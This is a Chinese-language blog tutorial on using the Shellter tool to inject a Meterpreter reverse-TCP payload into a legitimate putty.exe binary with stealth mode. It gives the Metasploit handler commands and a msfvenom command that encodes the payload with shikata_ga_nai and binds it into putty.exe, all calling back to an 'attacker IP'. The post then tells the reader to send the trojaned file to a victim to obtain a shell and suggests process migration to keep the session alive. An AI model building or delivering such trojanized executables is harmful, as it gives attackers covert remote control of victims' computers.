介绍
下载
使用
选择模式:
选择模式为“a”代表自动
需要选择一个可执行文件,并将其复制到Shellter文件夹中。
这里将putty.exe文件复制到Shellter文件夹,并将其与shellter.exe文件绑定
(由于Shellter仅支持32位PE文件。若注入64位文件就会直接报错。所以这里的putty.exe也是32位的)
然后可以看到DisASM.dll已经成功创建,并询问是否启用隐形模式。
输入'y'表示同意
选择Payload有效负载
Shellter会询问是想使用列出的有效载荷还是自定义有效载荷
输入'L'使用列出的Payload,并且选择第一个payload(Meterpreter_Reverse_TCP)
接着设置LHOST与LPORT
LHOST 设置为 192.168.1.133[攻击者IP]LPORT 设置为 4444
'a'模式下生成的新文件会覆盖原文件
打开Msf并开启监听
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.133 set lport 4444 exploit
然后将putty.exe文件发送到受害者机器,受害者机器一旦运行putty.exe我们就会收到shell
但是当受害者关闭这个putty.exe的时候会话就会直接断掉因为putty.exe是个前台交互进程,关闭窗口相当于进程终止,不过这个问题我们可以通过改善payload解决,即自定义一个自带进程迁移的payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.133 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o payload.exe -k -x putty.exe -a x86 --platform windows -b "\x00"
- THE END -
非特殊说明,本博所有文章均为博主原创。
如若转载,请注明出处:https://www.oneblanks.xyz/shellter%e5%b7%a5%e5%85%b7/
共有 0 条评论